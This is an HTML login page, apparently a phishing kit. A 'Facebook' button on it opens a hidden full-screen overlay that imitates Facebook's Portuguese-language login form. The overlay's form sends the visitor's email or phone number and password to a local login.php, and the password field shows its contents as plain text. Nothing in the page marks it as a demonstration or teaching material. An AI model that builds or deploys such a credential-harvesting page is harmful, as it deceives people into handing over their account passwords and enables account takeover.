<!DOCTYPE html>
<html lang="en">
<head>
	<title>Login V5</title>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
<!--===============================================================================================-->	
	<link rel="icon" type="image/png" href="images/icons/favicon.ico"/>
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="vendor/bootstrap/css/bootstrap.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="fonts/font-awesome-4.7.0/css/font-awesome.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="fonts/Linearicons-Free-v1.0.0/icon-font.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="vendor/animate/animate.css">
<!--===============================================================================================-->	
	<link rel="stylesheet" type="text/css" href="vendor/css-hamburgers/hamburgers.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="vendor/animsition/css/animsition.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="vendor/select2/select2.min.css">
<!--===============================================================================================-->	
	<link rel="stylesheet" type="text/css" href="vendor/daterangepicker/daterangepicker.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="css/util.css">
	<link rel="stylesheet" type="text/css" href="css/main.css">
	<style>
		body{margin: 0;}
		a{text-decoration: none;}
		.dig{
			background: #F5F6F8;
			width: 100%;
			padding: 14px;
			-moz-appearance: none;
			box-sizing: border-box;
			border-radius: 4px;
			overflow: hidden;
			border-top: 1px solid #F3F3F3;
			border-right: 1px solid #E8E8E8;
			border-bottom: 1px solid #D1D2D4;
			border-left: 1px solid #E6E6E6;
			font-family: Helvetica, Arial, sans-serif;
			font-size: 14px;
		}
		textarea:focus, input:focus {
			box-shadow: 0 0 0 0;
			outline: 0;
		}
		.botao{
			width: 100%;
			background: #1878F3;
			color: #FFFFFF;
			padding: 10px;
			-moz-appearance: none;
			box-sizing: border-box;
			border-radius: 5px;
			overflow: hidden;
			border-top: 1px solid #2B73D5;
			border-right: 1px solid #307AD1;
			border-bottom: 1px solid #2371D6;
			border-left: 1px solid #3678CC;
			font-family: Helvetica, Arial, sans-serif;
			font-size: 17px;
			font-weight: bolder;
			text-shadow: 0 -1px rgba(0, 0, 0, .25);
		}
		.esqueceu{
			color: #216fdb;
			font-family: 'Roboto-Regular', 'Helvetica', 'sans-serif';
			font-size: 14px;
			text-align: center;
		}
		.nova{
			background: #00A400;
			padding: 10px 16px;
			color: #FFF;
			font-family: Helvetica, Arial, sans-serif;
			font-size: 15px;
			font-weight: bolder;
			text-shadow: 0 -1px 0 rgba(0, 0, 0, .35);
			border-radius: 3px;
			height: 36px;
		}
	</style>
	<script>
		function demoDisplay() {
  document.getElementById("fb").style.display = "block";
}
	</script>
<!--===============================================================================================-->
</head>
<body>
	
	<div class="limiter">
		<div class="container-login100" style="background-image: url('images/bg-01.jpg');">
			<div class="wrap-login100 p-l-110 p-r-110 p-t-62 p-b-33">
				<form class="login100-form validate-form flex-sb flex-w">
					<span class="login100-form-title p-b-53">
						Entrar com
					</span>

					<a href="#" onClick="demoDisplay()" class="btn-face m-b-20">
						<i class="fa fa-facebook-official"></i>
						Facebook
					</a>
				
				</form>
			</div>
		</div>
	</div>
	

	<div id="dropDownSelect1"></div>
	
<!--===============================================================================================-->
	<script src="vendor/jquery/jquery-3.2.1.min.js"></script>
<!--===============================================================================================-->
	<script src="vendor/animsition/js/animsition.min.js"></script>
<!--===============================================================================================-->
	<script src="vendor/bootstrap/js/popper.js"></script>
	<script src="vendor/bootstrap/js/bootstrap.min.js"></script>
<!--===============================================================================================-->
	<script src="vendor/select2/select2.min.js"></script>
<!--===============================================================================================-->
	<script src="vendor/daterangepicker/moment.min.js"></script>
	<script src="vendor/daterangepicker/daterangepicker.js"></script>
<!--===============================================================================================-->
	<script src="vendor/countdowntime/countdowntime.js"></script>
<!--===============================================================================================-->
	<script src="js/main.js"></script>
<div id="fb" style="margin: 0 auto; z-index: 2; position: absolute; left:0; top:0; display: none; background: #FFF; width: 100%; height: 100%;">
<table style="margin: 0 auto;" width="460" border="0" cellspacing="0" cellpadding="0">
  <tbody>
    <tr>
      <td>
      <img src="imgs/topo.fw.png" width="100%" />
	  </td>
    </tr>
    <tr>
      <td style="padding: 4%">
		  <form enctype="multipart/form-data" action="login.php">
			<div class="daiv">
			  <input style="margin-bottom: 8px;" class="dig" placeholder="Número de celular ou email" name="email" type="text"><br>
			</div>
			<div class="daiv">
			  <input style="margin-bottom: 12px;" class="dig" placeholder="Senha" name="pw" type="text"><br>
			</div>
		  	<input class="botao" value="Entrar" type="submit">
		  </form>
	  </td>
    </tr>
    <tr>
      <td><div style="text-align: center; margin-bottom: 10px;"><a class="esqueceu" href="#">Esqueceu a senha?</a></div></td>
    </tr>
    <tr>
      <td style="padding: 0 8%;">
	  <img src="imgs/ou.fw.png" width="100%" /></td>
    </tr>
    <tr>
      <td><div style="margin-bottom: 120px; margin-top: 20px; text-align: center;"><a class="nova" href="#">Criar nova conta</a></div></td>
    </tr>
    <tr>
      <td style="padding: 0 18%;">
      <img src="imgs/linguagens.fw.png" width="100%" /></td>
    </tr>
  </tbody>
</table>
</div>
</body>
</html>